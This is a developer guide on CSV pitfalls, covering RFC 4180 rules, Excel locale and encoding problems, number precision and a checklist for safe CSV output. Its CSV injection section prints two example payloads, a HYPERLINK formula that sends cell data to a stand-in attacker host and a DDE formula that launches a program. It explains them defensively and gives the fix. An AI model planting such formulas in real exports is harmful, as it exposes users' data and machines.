CSV pitfalls
RFC 4180 rules, why Excel opens your CSV wrong, formula injection via = and @, encoding traps, and a checklist for producing safe CSV.
CSV looks like the simplest format ever invented. It isn't. There's a spec nobody follows, an "Excel dialect" that half the world uses, and several places where "just split on commas" will silently corrupt your data or open a security hole. Here's what actually matters.
The RFC 4180 rules — the closest thing to a spec
- Records separated by
CRLF(yes, really). - Fields separated by commas.
- Fields containing commas, quotes, or line breaks must be wrapped in double quotes.
- Double quotes inside a quoted field are escaped by doubling:
"". - Optional header row on line 1.
- All rows should have the same number of fields.
Real CSV in the wild uses LF (not CRLF), semicolons in European locales, tabs in "TSV", and inconsistent quoting. A hand-written parser will get most of it right and one edge case wrong. Use a library — PapaParse in JS, Python's csv module, Go'sencoding/csv. Never split(",").
Why Excel opens your CSV wrong
The three most common culprits:
- Locale. German, French, and Spanish Excel treat
;as the delimiter and,as the decimal separator. A "comma-separated" file will open as one giant column. - Numbers becoming dates.
1/2becomes "1-Feb". Gene names likeSEPT1become "1-Sep". Prefix with=and quote:="SEPT1", or ship.xlsxinstead. - UTF-8 without a BOM. Excel on Windows assumes Windows-1252 unless you prepend a UTF-8 BOM (
0xEF 0xBB 0xBF). Accented characters end up mojibake without it. On modern Excel (Microsoft 365) this is less common but still bites.
CSV injection — the security bug you didn't know you had
If a cell starts with =, +, -, or @, Excel and Google Sheets treat the rest of the cell as a formula when the user opens the file. An attacker who can put text in your CSV export can inject:
=HYPERLINK("https://evil.example/steal?d="&A1,"Click me")
=cmd|'/c calc'!A1 ← older Excel could execute thisFix: when generating CSV from untrusted input, prefix any cell starting with those four characters with a single quote (') or wrap the whole field with an escape that neutralizes it. OWASP calls this out explicitly.
Delimiter and encoding checklist
| Concern | Recommendation |
|---|---|
| Delimiter | Comma for machine-to-machine, tab (TSV) for spreadsheet copy-paste. |
| Line ending | LF unless a Windows-only consumer requires CRLF. |
| Encoding | UTF-8. Add a BOM only if you know Excel-on-Windows users will open it directly. |
| Quoting | Quote every string. It's more bytes but eliminates a whole class of parser disagreements. |
| Nulls | Pick one convention: empty cell, NULL, or \N. Document it. |
| Booleans | Write true/false. Don't use 1/0 unless the schema is fixed. |
Numbers, IDs, and precision
- Long IDs lose precision. Excel treats numbers as IEEE 754 doubles — anything past 15 digits gets rounded. Store IDs as strings and pre-format with a leading quote or by writing
.xlsx. - Leading zeros disappear. ZIP codes, product SKUs, country phone codes. Same fix.
- Currency and thousands separators.
1,234.56is a comma inside a number in US locale and a thousand+decimal swap in EU locale. Emit raw numbers; format in the UI.
Producing safe CSV — a template
- Use a library, always.
- Quote every field, or at least every field that could contain a delimiter, quote, or line break.
- Neutralize formula-injection prefixes on any untrusted string.
- Choose the encoding and delimiter based on the consumer, and document them in the filename or a README.
- Ship a header row.
- Emit ISO 8601 for dates, raw numbers for numbers, and
true/falsefor booleans. - If Excel-on-Windows users open the file directly, add a UTF-8 BOM.
Converting CSV to something better
Once CSV has served its purpose (transport, import), convert to a format with actual types. Our CSV to JSON, CSV to SQL, and CSV to Markdown converters run in the browser — no upload, no signup.
The one-line summary
CSV is a lowest-common-denominator format that only looks simple. Use a library, quote everything, and know what your consumer expects — and it will do its job.